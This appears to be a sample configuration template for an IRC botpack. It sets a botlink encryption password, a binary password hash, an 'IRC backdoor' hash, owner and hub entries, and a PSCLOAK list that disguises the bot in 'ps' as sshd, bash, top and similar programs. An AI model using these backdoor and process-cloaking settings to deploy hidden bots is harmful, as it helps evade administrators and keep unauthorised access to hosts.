pack.cfg.sample 1.5 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859
  1. /* The < && > indicates the area you must change! */
  2. /* PACKNAME: name of the pack */
  3. PACKNAME <name>
  4. /* NETPASS: 15 random characters used for botlink encryption */
  5. NETPASS <15charstring>
  6. /* SHELLHASH: 33 char md5 hash used for binary password */
  7. SHELLHASH <md5hash>
  8. /* BDHASH: 33 char md5 hash used for IRC backdoor */
  9. BDHASH <md5hash>
  10. /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
  11. DCCPREFIX <.>
  12. /* The settings below can each be defined multiple times */
  13. /* OWNER <nick password host>
  14. * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
  15. * nick: nickname what else?
  16. * password: initial password for user
  17. * host: hosts of the user (list as many as needed)
  18. */
  19. OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
  20. /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
  21. * list as many as needed
  22. */
  23. OWNEREMAIL <some@email.com>
  24. /* HUB <nick host port host>
  25. * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
  26. * nick: nick of hub
  27. * host: hostname or ip of hub
  28. * port: port the hub listens on
  29. * ident: ident of the hub (list as many as needed)
  30. */
  31. HUB <God god.net 666 god ~God>
  32. /* PSCLOAK <name>
  33. * name: the name of the program to spoof as in 'ps'
  34. * list as many as needed
  35. * A default list is provided
  36. */
  37. PSCLOAK -bash
  38. PSCLOAK ftp
  39. PSCLOAK /usr/sbin/sshd
  40. PSCLOAK man
  41. PSCLOAK pine
  42. PSCLOAK bash
  43. PSCLOAK top
  44. PSCLOAK last
  45. PSCLOAK w
  46. PSCLOAK ps ux
  47. PSCLOAK bash
  48. PSCLOAK ./psybnc
  49. PSCLOAK BitchX